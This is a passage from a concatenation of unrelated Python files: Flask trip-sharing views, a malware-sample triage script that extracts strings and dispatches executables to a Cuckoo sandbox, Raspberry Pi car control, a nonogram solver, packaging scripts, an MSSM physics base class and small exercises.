        storage.save(current_user)
        # FIX: a Flask view must return a response; the original returned
        # None on the success path, which is a server error.
        return jsonify({"response": "Successfully Sent!"})
    else:
        abort(404)
#######################################################################
# Object Deletion Functions
@application.route('/delete_trip/<tripid>', methods=["DELETE"])
@login_required
def delete_trip(tripid):
    '''
    Deletes a trip and removes it from every member's trip lists
    (hosted_trips for the host, active_trips for everyone else).
    '''
    trip = storage.get("Trip", tripid)
    if trip:
        for user in trip.users:
            person = storage.get_user(user)
            if person.username == trip.host:
                person.hosted_trips.remove(tripid)
            else:
                person.active_trips.remove(tripid)
            storage.save(person)
        storage.delete(trip)
        # Client-side redirect payload consumed by the AJAX caller
        return jsonify(dict(redirect=url_for('display_profile')))
    else:
        abort(404)
#######################################################################
# Notification Accept/Reject Functions
@application.route('/notification/<noteid>/accepted_request/<tripid>')
@login_required
def accept_request(noteid, tripid):
    '''
    The sequence of events that occur after the host of a trip
    accepts another user's request to join their trip
    '''
    trip = storage.get("Trip", tripid)
    if trip:
        note = storage.get("Notification", noteid)
        if note:
            user = storage.get_user(note.sender)
            host = storage.get_user(note.recipient)
            if user and host:
                # Add the requester to the trip and move the notification
                # from sent/received into the requester's approved list
                trip.users.append(user.username)
                user.active_trips.append(trip.id)
                user.notifications['approved'].append(note.id)
                user.notifications['sent'].remove(note.id)
                host.notifications['received'].remove(note.id)
                storage.save(trip)
                storage.save(user)
                storage.save(host)
                return jsonify(dict(redirect=url_for('display_notifications')))
            else:
                abort(404)
        else:
            abort(404)
    else:
        abort(404)
@application.route('/notification/<noteid>/rejected_request')
@login_required
def reject_request(noteid):
    '''
    The sequence of events that occur after the host of a trip
    rejects another user's request to join their trip
    '''
    note = storage.get("Notification", noteid)
    if note:
        user = storage.get_user(note.sender)
        host = storage.get_user(note.recipient)
        if user and host:
            print(user.notifications)
            print(host.notifications)
            # Move the notification from sent/received to the sender's rejected list
            user.notifications['rejected'].append(note.id)
            user.notifications['sent'].remove(note.id)
            host.notifications['received'].remove(note.id)
            print(user.notifications)
            print(host.notifications)
            storage.save(user)
            storage.save(host)
            return jsonify(dict(redirect=url_for('display_notifications')))
        else:
            abort(404)
    else:
        abort(404)
|
#!/usr/bin/python3
"""
Copyright (c) 2015, Joshua Saxe
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name 'Joshua Saxe' nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL JOSHUA SAXE BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from cuckooanalysis import dispatchcuckoo
from auxiliary import pecheck, getdatabase
from extractattributes import extractstrings
def handlenonexe(documentsamples):
    """
    Store `strings` attributes of non-exe malware samples in shelve db
    Args:
        documentsamples: absolute paths of all non-exe malware samples
    Raises:
    Returns:
        None
    """
    successcounter = 0  # samples processed so far (for the summary line)
    # Get shelve database object
    db = getdatabase()
    for path in documentsamples:
        # Get malware sample's printable strings and store in dict
        db[path] = extractstrings(path)
        # Write data back to db after every sample so a crash loses at most one
        db.sync()
        successcounter = successcounter + 1
        #print ("[*] Extracted {0} attributes from {1}".format(len(attributes), path))
    print("Extracted attributes for " + str(successcounter) + \
          " document type malware samples")
def handleexe(exesamples):
    """Dispatch exe samples to cuckoo for analysis.

    Successful task ids are written to `taskids` and error ids to
    `errorids`, both comma-separated files in the current directory.

    Args:
        exesamples: absolute paths of all exe malware samples.
    Returns:
        None
    """
    taskids, errorids = dispatchcuckoo(exesamples)
    # Persist each non-empty id list; order (tasks first) matches the
    # original behaviour.
    outputs = (
        (taskids, 'taskids', "[*] Received task ids! Writing to `taskids`"),
        (errorids, 'errorids', "[*] Received error ids! Writing to `errorids`"),
    )
    for ids, filename, message in outputs:
        if ids:
            print(message)
            with open(filename, 'w') as f:
                f.write(','.join(map(str, ids)))
def store(malwarepaths):
    """Route malware samples: non-exe `strings` into the shelve db, exes to cuckoo.

    Args:
        malwarepaths: absolute paths of all malware samples.
    Returns:
        None
    """
    exesamples = []
    documentsamples = []
    # Single pass over the paths; pecheck() decides the bucket.
    for samplepath in malwarepaths:
        bucket = exesamples if pecheck(samplepath) else documentsamples
        bucket.append(samplepath)
    # Store `strings` of non-exe samples in shelve db.
    if documentsamples:
        handlenonexe(documentsamples)
        print("[+] Stored `strings` attributes in shelve DB")
    # Dispatch exe samples to cuckoo.
    if exesamples:
        handleexe(exesamples)
        print("[+] Dispatched exe samples to cuckoo")
|
# Upper bound on rank values processed — presumably a ranking-crawl cutoff;
# TODO confirm against the consumer of this module.
MAX_RANK = 15000
# Number of items per page for paginated requests.
PER_PAGE = 25
# Maps plural category keys to their singular type name.
TYPES = dict(
    designers='designer',
    publishers='publisher',
    artists='artist',
    mechanics='mechanic',
)
WAR_RANK = 500 |
#! /usr/bin/python
# coding=utf-8
import time
import select
import sys
import os
import RPi.GPIO as GPIO
import numpy as np
import picamera
import picamera.array
import matplotlib.pyplot as plt
import time
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import math
import os
from car import Car
from infrad import Infrad
from lane_lines import *
# 10-sample rolling window of lane-slope sums, consumed by the FFT-based
# kratesum() variant below.  `[0] * 10` replaces the needless comprehension.
krate_sum = [0] * 10
def forward(car):
    """Drive straight ahead in a 0.1 s burst, then halt."""
    burst = (60, 60)
    car.set_speed(*burst)
    time.sleep(0.1)
    car.set_speed(0, 0)
def find_left(car):
    """Pivot left (counter-rotating wheels) for 0.15 s, then cruise slowly."""
    pivot = (-100, 100)
    car.set_speed(*pivot)
    time.sleep(0.15)
    car.set_speed(50, 50)
def find_right(car):
    """Pivot right (counter-rotating wheels) for 0.15 s, then cruise slowly."""
    pivot = (100, -100)
    car.set_speed(*pivot)
    time.sleep(0.15)
    car.set_speed(50, 50)
def rush_left(car):
    """Hard left-turn burst (0.1 s at full counter-rotation), then cruise."""
    hard_pivot = (-200, 200)
    car.set_speed(*hard_pivot)
    time.sleep(0.1)
    car.set_speed(50, 50)
def rush_right(car):
    """Hard right-turn burst (0.2 s at full counter-rotation), then cruise.

    Bug fix: the original commanded (-200, 200) — the same wheel pattern as
    rush_left, i.e. it turned LEFT.  Mirrored to (200, -200) to match the
    find_left/find_right left-right pairing used elsewhere in this file.
    """
    car.set_speed(200, -200)
    time.sleep(0.2)
    car.set_speed(50, 50)
def set_slow(car):
    """Back up briefly, pivot left, then settle into a slow forward roll."""
    # (wheel speeds, hold time) pairs executed in order.
    for speeds, hold in (((-80, -80), 0.25), ((-160, 160), 0.2)):
        car.set_speed(*speeds)
        time.sleep(hold)
    car.set_speed(50, 50)
def krate(line):
    """Return (x1 - x2) / (y1 - y2) for segment (x1, y1, x2, y2), to 4 dp.

    Note: this is the RECIPROCAL of the usual dy/dx slope, and it raises
    ZeroDivisionError for horizontal segments (y1 == y2).
    """
    x1, y1, x2, y2 = line
    return round((x1 - x2) / (y1 - y2), 4)
def kratesum(lines):
    """Dead code: immediately shadowed by the redefinition of `kratesum` below.

    This version pushed the pair's krate sum into the 10-slot rolling window
    `krate_sum` and returned its FFT.  Because the later definition wins at
    import time, this body is never callable — kept for reference only.
    """
    global krate_sum
    rsum = krate(lines[0]) + krate(lines[1])
    # Slide the window: drop the oldest sample, append the newest.
    del krate_sum[0]
    krate_sum.append(rsum)
    result=np.fft.fft(krate_sum)
    return(result)
def kratesum(lines):
    """Return the sum of krate() over the first two line segments."""
    left_line, right_line = lines[0], lines[1]
    return krate(left_line) + krate(right_line)
def stage_control(lines, car):
    """Choose and execute a steering action from the detected lane lines.

    Args:
        lines: sequence of exactly two lane segments (x1, y1, x2, y2), or
            None when detection failed.
        car: Car instance commanded through set_speed().
    Returns:
        The (v1, v2) wheel-speed pair that was commanded, or (-1, -1) when
        *lines* is missing or not a pair.
    """
    # Fix: `lines != None` is fragile when `lines` is a numpy array (the
    # comparison broadcasts elementwise); an identity test is the correct
    # None check and behaves identically for lists/tuples.
    if lines is not None and len(lines) == 2:
        k = kratesum(lines)
    else:
        return -1, -1
    if abs(k) <= 4:
        forward(car)
        v1, v2 = 60, 60
    elif k < -4:
        find_right(car)
        v1, v2 = 60, -60
    elif k > 4:
        find_left(car)
        v1, v2 = -60, 60
    # car.set_speed(v1, v2)
    return v1, v2
def stage_detect(image_in):
    """Detect the two lane lines in a BGR camera frame.

    Returns a pair [left, right] of segments (x1, y1, x2, y2), ordered
    left-to-right, each with its first endpoint the lower (larger-y) one,
    or None when the Hough transform finds no lines.

    NOTE(review): relies on globals pulled in via `from lane_lines import *`
    (kernel_size, low/high_threshold, trap_* ratios, rho, theta, threshold,
    min_line_length, max_line_gap, filter_colors, draw_lines, ...) — confirm
    they are all defined there.  Also assumes draw_lines yields at least two
    segments; IndexError otherwise.
    """
    # Colour-mask, grey, blur, then edge-detect the frame.
    image = filter_colors(image_in)
    gray = grayscale(image)
    blur_gray = gaussian_blur(gray, kernel_size)
    edges = canny(blur_gray, low_threshold, high_threshold)
    imshape = image.shape
    # Trapezoidal region of interest covering the road ahead.
    vertices = np.array([[\
        ((imshape[1] * (1 - trap_bottom_width)) // 2, imshape[0]),\
        ((imshape[1] * (1 - trap_top_width)) // 2, imshape[0] - imshape[0] * trap_height),\
        (imshape[1] - (imshape[1] * (1 - trap_top_width)) // 2, imshape[0] - imshape[0] * trap_height),\
        (imshape[1] - (imshape[1] * (1 - trap_bottom_width)) // 2, imshape[0])]]\
        , dtype=np.int32)
    masked_edges = region_of_interest(edges, vertices)
    img = masked_edges
    min_line_len = min_line_length
    lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)
    if lines is None:
        return None
    line_img = np.zeros((*img.shape, 3), dtype=np.uint8)  # 3-channel RGB image
    newlines = draw_lines(line_img, lines)
    # Normalise each segment so its first endpoint is the lower one.
    for line in newlines:
        if line[1] < line[3]:
            line[0], line[1], line[2], line[3] = line[2], line[3], line[0], line[1]
    # Order the pair left-to-right by x of the first endpoint.
    if newlines[0][0] > newlines[1][0]:
        newlines[0], newlines[1] = newlines[1], newlines[0]
    return(newlines)
if __name__ == '__main__':
    # Infrared-only line following: steer according to which of the four IR
    # sensors still see the track.  The camera/vision control path is the
    # disabled string at the bottom of the file.
    car = Car()
    inf = Infrad()
    v1, v2 = 60, 60
    car.set_speed(v1, v2)
    try:
        while True:
            # Two "old" and two "new" IR sensor readings — truthy means the
            # sensor sees something (exact semantics live in Infrad.detect).
            left, right, nl, nr = inf.detect()
            # print(left, right)
            left_ans = True if left else False
            right_ans = True if right else False
            new_left = True if nl else False
            new_right = True if nr else False
            print(str(left_ans) + ", " + str(right_ans) + ", " + str(new_left) + ', ' + str(new_right))
            # Steering decision table over the old/new sensor pairs; when no
            # branch matches the car keeps its last commanded speed.
            if not left_ans and right_ans and new_left and new_right:
                find_right(car)
            elif not right_ans and left_ans and new_left and new_right:
                find_left(car)
            elif not new_left and new_right:
                rush_left(car)
            elif not new_right and new_left:
                rush_right(car)
            elif not new_left and not new_right:
                set_slow(car)
    except KeyboardInterrupt:
        # Ctrl-C: release GPIO pins before exiting.
        GPIO.cleanup()
# Dead code: former camera-based control loop, kept for reference only.
"""
v1, v2 = 0, 0
rawCapture = picamera.array.PiRGBArray(camera, size = im_size)
for frame in camera.capture_continuous(rawCapture, format='bgr', use_video_port=True):
    image = frame.array
    image = image.reshape((640, 480, 3))
    rawCapture.truncate(0)
    lines = stage_detect(image)
    v1, v2 = stage_control(lines, car)
    # print(v1, v2)
    if lines != None:
        left, right = lines[0], lines[1]
        if left[0] > right[0]:
            left[0], right[0] = right[0], left[0]
        print(left[0]/320, right[0]/320, v1, v2)
    else:
        print(-1, -1)
"""
from memoize import memoized
def is_complete(csp, assignment):
    """An assignment is complete when all h rows of the nonogram have a value."""
    _, height, _, _ = csp
    return len(assignment) == height
@memoized
def order_domain_values(csp, var):
    """Yield every width-w bit row satisfying row `var`'s horizontal constraint.

    NOTE(review): @memoized on a generator function caches the generator
    OBJECT, so a second call with the same (csp, var) returns an already
    (partially) exhausted iterator — confirm this is intended.  Callers
    that take only one next() per key (e.g. complete_assignment) would be
    affected on repeated calls.
    """
    w, h, horiz_constr, vert_constr = csp
    # calculate the possible lengths and movements
    # generate the numbers by moving sequences of ones
    # (the constraint is reversed before generation)
    for bits in generate_bits(horiz_constr[var][::-1], w):
        yield bits
def generate_bits(constraint, length):
    """Generate all bit tuples of *length* whose runs of 1s match *constraint*."""
    empty_prefix, zeros_used, next_run = (), 0, 0
    return generate_bits_rec(constraint, length, empty_prefix, zeros_used, next_run)
def generate_bits_rec(constraint, length, bits, zeros, part):
    """Recursively emit bit tuples whose runs of 1s follow *constraint*.

    Args:
        constraint: tuple of run lengths; `part` indexes the next run to place.
        length: target width of emitted tuples.
        bits: prefix built so far.
        zeros: number of 0s used so far (bounds the remaining slack).
        part: stage counter; len(constraint) + 1 means "trailing zeros placed".
    """
    # Emit only when the prefix is full AND the trailing-zero stage is done.
    if len(bits) == length and part == len(constraint) + 1:
        yield bits
    # Before the first run and after the last one a zero-gap may be empty;
    # between two runs at least one separating 0 is required.
    if part == 0 or part >= len(constraint):
        choice_start = 0
    else:
        choice_start = 1
    # `choice` = number of 0s to place before the next run (or as trailer);
    # bounded by the slack left after all runs and zeros used so far.
    for choice in range(choice_start, length - sum(constraint) - zeros + 1):
        if part < len(constraint):
            # Place `choice` zeros followed by the next run of 1s.
            new_bits = bits + (0,) * choice + (1,) * constraint[part]
        else:
            # Final stage: only trailing zeros remain.
            new_bits = bits + (0,) * choice
        new_zeros = zeros + choice
        new_part = part + 1
        if new_part <= len(constraint) + 1 and len(new_bits) <= length:
            yield from generate_bits_rec(constraint, length, new_bits, new_zeros, new_part)
# @memoized
def is_consistent(csp, assignment, value):
    # Todo: should be called value_is_consistent_with_assignment
    """Assumes all the assignments are consistent with the horizontal constraints so it checks only the verticals."""
    w, h, horiz_constr, vert_constr = csp
    # Tentatively append `value` as the next (len(assignment)-th) row.
    new_ass = assign_value(assignment, value, len(assignment))
    # Columns can only be validated once the grid is full; partial grids are
    # accepted unconditionally.
    if len(new_ass) == h:
        for col in range(len(vert_constr)):
            if not col_is_consistent(csp, new_ass, vert_constr[col], col):
                return False
    return True
# @memoized
def col_is_consistent(csp, assignment, constr, col):
    """Check column *col* of the (full) assignment against its vertical constraint."""
    w, h, horiz_constr, vert_constr = csp
    column_bits = tuple(row_bits[col] for row_bits in assignment)
    return row_is_consistent(csp, column_bits, constr)
# @memoized
def row_is_consistent(csp, bits, constraint):
    """Return True iff the runs of consecutive 1s in *bits* equal *constraint*.

    *csp* is accepted for interface compatibility but unused.
    """
    runs = []
    run = 0
    for bit in bits:
        if bit:
            run += 1
        elif run:
            # A run of 1s just ended: record its length.
            runs.append(run)
            run = 0
    if run:
        runs.append(run)
    # Exact sequence match (same count and same lengths, in order).
    return list(runs) == list(constraint)
def complete_assignment(csp):
    """Build an initial full assignment: every row takes its first domain value."""
    w, h, horiz_constr, vert_constr = csp
    assignment = ()
    for row in range(h):
        first_value = next(order_domain_values(csp, row))
        assignment = assign_value(assignment, first_value, row)
    # todo: maybe choosing values consistent with the vertical constraints will speed things up since we start "nearer"
    return assignment
def assign_value(assignment, value, var):
    """Return a copy of the tuple *assignment* with slot *var* set to *value*."""
    before, after = assignment[:var], assignment[var + 1:]
    return before + (value,) + after
def null_assignment():
    """The empty assignment: no rows decided yet."""
    return tuple()
#
# def assign_value(assignment, value, var):
# return assignment[:var] + [value] + assignment[var + 1:]
#
#
# def null_assignment():
# return []
|
from setuptools import setup, Extension
def readme():
    """Return the contents of the project README (used as the long description)."""
    with open('README.md') as readme_file:
        return readme_file.read()
# Packages and extra data files shipped with the distribution.
PACKAGES = ['cornichon']
PACKAGE_DATA = {
    '.': ['README.md']
}

# import distutils.sysconfig
setup(name='cornichon',
      version='0.1',
      description='A way to save the data of a class in python',
      long_description=readme(),
      classifiers=[
          # Fix: 'Development Status :: 1 - Prealpha' and the bare
          # 'License :: ' entry are not valid trove classifiers and are
          # rejected by PyPI tooling; replaced with the canonical ones
          # matching license='MIT' below.
          'Development Status :: 2 - Pre-Alpha',
          'License :: OSI Approved :: MIT License',
          'Programming Language :: Python :: 3.6',
      ],
      url='http://github.com/',
      author='Thomas Lettau',
      author_email='thomas_lettau@gmx.de',
      license='MIT',
      packages=PACKAGES,
      # install_requires=[
      #     'pickle'
      # ],
      package_data=PACKAGE_DATA,
      zip_safe=False)
|
class Solution:
    # Reference discussions:
    # https://leetcode.com/problems/reverse-integer/discuss/4220/Simple-Python-solution-56ms
    # https://leetcode.com/problems/reverse-integer/discuss/4055/Golfing-in-Python
    def reverse(self, x):
        """Reverse the decimal digits of *x*, preserving its sign.

        :type x: int
        :rtype: int -- 0 when the reversed magnitude exceeds 2**31 - 1
        """
        is_negative = x < 0
        reversed_magnitude = int(str(abs(x))[::-1])
        if reversed_magnitude > 2 ** 31 - 1:
            # 32-bit signed overflow per the LeetCode contract.
            return 0
        return -reversed_magnitude if is_negative else reversed_magnitude
# s = -12345
# print (int(str(-s)[::-1]))
|
__author__ = "Narwhale"
import socket
# Line-based TCP client: forwards each user-typed line to localhost:10000
# and prints the raw bytes reply; an empty input line ends the session.
client = socket.socket()
client.connect(('localhost',10000))
while True:
    mag = input('>>>>:')
    if not mag:
        # Empty input terminates the loop (socket closes on interpreter exit).
        break
    client.send(mag.encode(encoding='utf-8'))
    # Blocking read of up to 1 KiB; printed as a bytes literal.
    data = client.recv(1024)
    print(data)
|
#!/usr/bin/env python
import setuptools
# The PyPI long description is taken verbatim from the README.
with open("README.md", "r") as fh:
    long_description = fh.read()
# Standard setuptools packaging metadata for the homologue-classification tool.
setuptools.setup(
    name="onglai-classify-homologues",
    version="1.0.0",
    author="Adelene Lai",
    author_email="adelene.lai@uni.lu",
    maintainer="Adelene Lai",
    maintainer_email="adelene.lai@uni.lu",
    description="A cheminformatics algorithm to classify homologous series.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/adelenelai/onglai-classify-homologues",
    packages=setuptools.find_packages(),
    license="Apache",
    install_requires=[
        "pandas",
        "numpy",
        "matplotlib",
        "pytest",
        "rdkit",
        "datamol",
    ],
    # Ship the algorithm script and utils alongside the package.
    package_data={"onglai-classify-homologues":["nextgen_classify_homologues*.*", "utils*.*"]},
    classifiers=[
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3 :: Only",
        "License :: OSI Approved :: Apache Software License",
        "Operating System :: OS Independent",
    ],
    python_requires=">=3.5",
)
|
"""Abstract base class for MSSM calculation."""
import json
import logging
import math
import pathlib
from typing import List, Optional
import simsusy.mssm.library
from simsusy.mssm.input import MSSMInput
logger = logging.getLogger(__name__)
class AbsSMParameters:
    """
    The abstract version of the Standard Model parameters.

    As an abstract class, this class only provides a basic I/O interface from
    the SMINPUTS block and from the default_value file. Values except pole
    masses are calculated in various loop levels, so left as unimplemented.

    Note that mz(), mw(), vev(), etc. may be scale dependent, while mass(pid)
    should return some scale-independent value (e.g., the pole mass).
    """

    # JSON file with fall-back values for SMINPUTS entries absent from input.
    DEFAULT_DATA = (
        pathlib.Path(__file__).parent.parent.resolve() / "default_values.json"
    )

    def default_value(self, key: str) -> float:
        """Return a value read from DEFAULT_DATA.

        Raises RuntimeError when the key is missing or its "value" entry is
        not a float.
        """
        default = self.default_values.get(key)
        if isinstance(default, dict):
            if isinstance(value := default.get("value"), float):
                return value
        raise RuntimeError(
            f"Invalid parameter {key} in {self.DEFAULT_DATA}, which must be float."
        )

    def __init__(self, input: MSSMInput) -> None:  # noqa: A002
        with open(self.DEFAULT_DATA) as f:
            self.default_values = json.load(f)

        def get(key: int, default_key: str) -> float:
            # SMINPUTS value if present; otherwise the packaged default
            # (logged so silent fall-backs are visible to the user).
            value = input.sminputs(key, default=None)
            if isinstance(value, float):
                return value
            logger.info("Block SMINPUTS %d missing; default value is used.", key)
            return self.default_value(default_key)

        # Key numbers follow the SLHA(2) SMINPUTS convention.
        self._alpha_em_inv = get(1, "alpha_EW_inverse@m_Z")  # MS-bar (5 active flavors)
        self._g_fermi = get(2, "G_F")
        self._alpha_s = get(3, "alpha_s@m_Z")  # MS-bar, with 5 active flavors
        self._mz = get(4, "m_Z")  # pole
        self._mb_mb = get(5, "m_b@m_b")  # MS-bar, at mb
        self._mt = get(6, "m_t")  # pole
        self._mtau = get(7, "m_tau")  # pole
        self._mnu1 = get(12, "m_nu1")  # pole
        self._mnu2 = get(14, "m_nu2")  # pole
        self._mnu3 = get(8, "m_nu3")  # pole
        self._me = get(11, "m_e")  # pole
        self._mmu = get(13, "m_mu")  # pole
        self._md_2gev = get(21, "m_d@2GeV")  # MS-bar, at 2GeV
        self._mu_2gev = get(22, "m_u@2GeV")  # MS-bar, at 2GeV
        self._ms_2gev = get(23, "m_s@2GeV")  # MS-bar, at 2GeV
        self._mc_mc = get(24, "m_c@m_c")  # MS-bar, at mc

    # pole-mass handlers
    def mass(self, pid: int) -> float:
        """Return the pole mass of the particle with the given PDG ID.

        Returns the NotImplemented constant (not an exception) for PDG IDs
        not covered here (e.g. light quarks); concrete subclasses are
        expected to override.
        """
        if pid == 6:
            return self._mt
        elif pid == 11:
            return self._me
        elif pid == 13:
            return self._mmu
        elif pid == 15:
            return self._mtau
        elif pid == 12:
            return self._mnu1
        elif pid == 14:
            return self._mnu2
        elif pid == 16:
            return self._mnu3
        elif pid == 23:
            return self._mz
        else:
            return NotImplemented

    def mass_u(self) -> List[float]:
        """Return the up-type quark masses."""
        # Note: mass(2)/mass(4) are NotImplemented in this base class.
        return [self.mass(i) for i in (2, 4, 6)]

    def mass_d(self) -> List[float]:
        """Return the down-type quark masses."""
        return [self.mass(i) for i in (1, 3, 5)]

    def mass_e(self) -> List[float]:
        """Return the charged lepton masses."""
        return [self.mass(i) for i in (11, 13, 15)]

    def mass_n(self) -> List[float]:
        """Return the neutrino masses."""
        return [self.mass(i) for i in (12, 14, 16)]

    # Weinberg angles, dependent on `_sin_sq_cos_sq`.
    def sin_w_sq(self) -> float:
        """Return sin^2(theta_w)."""
        # Solve s^2 * (1 - s^2) = r for the smaller root:
        # s^2 = (1 - sqrt(1 - 4r)) / 2, rewritten for numerical stability.
        r = self._sin_sq_cos_sq()
        return 2 * r / (1 + math.sqrt(1 - 4 * r))

    def cos_w_sq(self) -> float:
        """Return cos^2(theta_w)."""
        r = self._sin_sq_cos_sq()
        return (1 + math.sqrt(1 - 4 * r)) / 2

    # abstract functions
    def _sin_sq_cos_sq(self) -> float:
        """Return sin^2(theta_w)*cos^2(theta_w)."""
        return NotImplemented

    def mz(self) -> float:
        """Return the Z-boson mass, which may not be the pole mass."""
        return self._mz

    def mw(self) -> float:
        """Return the W-boson mass, which may not be the pole mass."""
        return NotImplemented

    def gw(self) -> float:
        """Return the SU(2)_weak coupling."""
        return NotImplemented

    def gy(self) -> float:
        """Return the U(1)_Y coupling."""
        return NotImplemented

    def gs(self) -> float:
        """Return the strong coupling."""
        return NotImplemented

    def vev(self) -> float:
        """Return the vacuum expectation value of Higgs."""
        return NotImplemented
class AbsEWSBParameters:
    """
    The abstract version of the MSSM EWSB parameters.

    As an abstract class, this class only provides I/O from the input file.

    The SLHA convention allows following inputs:

    - tan(beta) and two Higgs soft masses,
    - tan(beta), mu, and tree-level pseudo-scalar mass,
    - tan(beta), mu, and pseudo-scalar pole mass,
    - tan(beta), mu, and charged-Higgs pole mass.

    The input file should have a proper combination of those seven parameters
    and the calculator should be able to handle any of the combinations. Also,
    if mu is not specified, `sign_mu` is allowed as a complex input, which
    should be properly handled.
    """

    sign_mu: complex  # sign (or argument) of mu parameters
    _tb_ewsb: Optional[float]  # tan(beta) at the EWSB scale
    _tb_input: Optional[float]  # tan(beta) at the input scale
    mh1_sq: Optional[complex]  # down-type Higgs soft mass at the input scale
    mh2_sq: Optional[complex]  # up-type Higgs soft mass at the input scale
    mu: Optional[complex]  # mu-parameter at the input scale
    ma_sq: Optional[complex]  # tree-level mass of A at the input scale
    ma0: Optional[float]  # pole mass of A
    mhc: Optional[float]  # pole mass of H+

    # abstracts
    @property
    def tan_beta(self) -> float:
        """Return tan_beta at the input scale."""
        return NotImplemented  # should be implemented in the derived class

    def alpha(self) -> float:
        """Return the angle between the Higgses."""
        return NotImplemented

    # implementation
    def __init__(self, model: MSSMInput) -> None:
        """Fill the values from SLHA input."""
        self._tb_ewsb = model.get_float("MINPAR", 3, default=None)
        self._tb_input = model.get_float("EXTPAR", 25, default=None)
        self.mh1_sq = model.get_complex("EXTPAR", 21, default=None)
        self.mh2_sq = model.get_complex("EXTPAR", 22, default=None)
        self.mu = model.get_complex("EXTPAR", 23, default=None)
        self.ma_sq = model.get_complex("EXTPAR", 24, default=None)
        self.ma0 = model.get_float("EXTPAR", 26, default=None)
        self.mhc = model.get_float("EXTPAR", 27, default=None)
        # determine the sign of mu parameter
        if self.mu is not None:  # direct specification of mu parameter
            self.sign_mu = 1
        else:  # |mu| is determined by EWSB condition and sign_mu is required.
            sin_phi_mu = model.get_float("IMMINPAR", 4, default=None)
            if sin_phi_mu:  # CP-violated
                cos_phi_mu = model.get_float("MINPAR", 4)
                # (cos, sin) must be approximately on the unit circle.
                if not (0.99 < (abs_sq := cos_phi_mu**2 + sin_phi_mu**2) < 1.01):
                    raise ValueError("Invalid mu-phase (MINPAR 4 and IMMINPAR 4)")
                self.sign_mu = complex(cos_phi_mu, sin_phi_mu) / math.sqrt(abs_sq)
            else:  # CP-conserved
                sign_mu = model.get_float("MINPAR", 4)
                if not 0.9 < abs(sign_mu) < 1.1:
                    # Fix: the value checked here is read from MINPAR 4 (the
                    # SLHA sign(mu) entry), so the message must cite MINPAR,
                    # not EXTPAR.
                    raise ValueError("Invalid MINPAR 4; either 1 or -1.")
                self.sign_mu = -1 if sign_mu < 0 else 1
        # mh1_sq and mh2_sq may be specified in the MINPAR block.
        if self._count_unspecified_params() > 4:
            if (m0 := model.get_float("EXTPAR", 1, default=None)) is not None:
                if self.mh1_sq is None:
                    self.mh1_sq = m0 * m0
                if self.mh2_sq is None:
                    self.mh2_sq = m0 * m0
        # check if tan(beta) is properly set.
        # Fix: NotImplemented is a singleton, so test identity; `==` against
        # a float triggers the deprecated NotImplemented-in-bool-context path.
        if self.tan_beta is NotImplemented:
            raise RuntimeError("Missing implementation of tan_beta().")
        elif self.tan_beta is None:
            logger.error("invalid specification of tan_beta")
        # check if the parameters are set in one of the proper combinations.
        if self._count_unspecified_params() == 4:  # it must be four.
            if self.mh1_sq is not None and self.mh2_sq is not None:
                return  # pass
            elif self.mu is not None:
                if (
                    self.ma_sq is not None
                    or self.ma0 is not None
                    or self.mhc is not None
                ):
                    return  # pass
        logger.error("invalid specification of EWSB parameters")

    def _count_unspecified_params(self) -> int:
        """Return how many of the six EWSB parameters are still None."""
        return [
            self.mh1_sq,
            self.mh2_sq,
            self.mu,
            self.ma_sq,
            self.ma0,
            self.mhc,
        ].count(None)

    def is_set(self) -> bool:
        """Check if the EWSB parameter is calculated."""
        return (
            isinstance(self.tan_beta, (int, float))
            and self._count_unspecified_params() == 0
        )

    def yukawa(self, species: simsusy.mssm.library.A) -> List[float]:
        """Return the diagonal of Yukawa."""
        if species == simsusy.mssm.library.A.U:
            return self.yu()
        elif species == simsusy.mssm.library.A.D:
            return self.yd()
        elif species == simsusy.mssm.library.A.E:
            return self.ye()
        else:
            raise RuntimeError("invalid call of ewsb.yukawa")

    # virtual functions
    def yu(self) -> List[float]:
        """Return the diagonal of up-type Yukawa after super-CKM rotation."""
        raise NotImplementedError

    def yd(self) -> List[float]:
        """Return the diagonal of down-type Yukawa."""
        raise NotImplementedError

    def ye(self) -> List[float]:
        """Return the diagonal of charged-lepton Yukawa."""
        raise NotImplementedError

    def mass(self, pid: int) -> float:
        """Return the pole mass of the particle with the given PDG ID."""
        raise NotImplementedError
|
# Fibonacci sequence printer (prompt text kept in Portuguese).
print('=' * 30)
# Fix: header typo 'Sequeência' -> 'Sequência'.
print('Sequência de Fibonacci')
print('-' * 30)
n = int(input('Digite quantos termos você deseja? '))
t1 = 0
t2 = 1
c = 3  # counter starts at 3: the first two terms are printed up-front
# Fix: the original printed ' {} -> {} ->' followed by ' ->{}' per term,
# producing a doubled arrow ("1 -> ->2"); arrows now appear exactly once
# between consecutive terms.
print(' {} -> {}'.format(t1, t2), end='')
while c <= n:
    t3 = t1 + t2
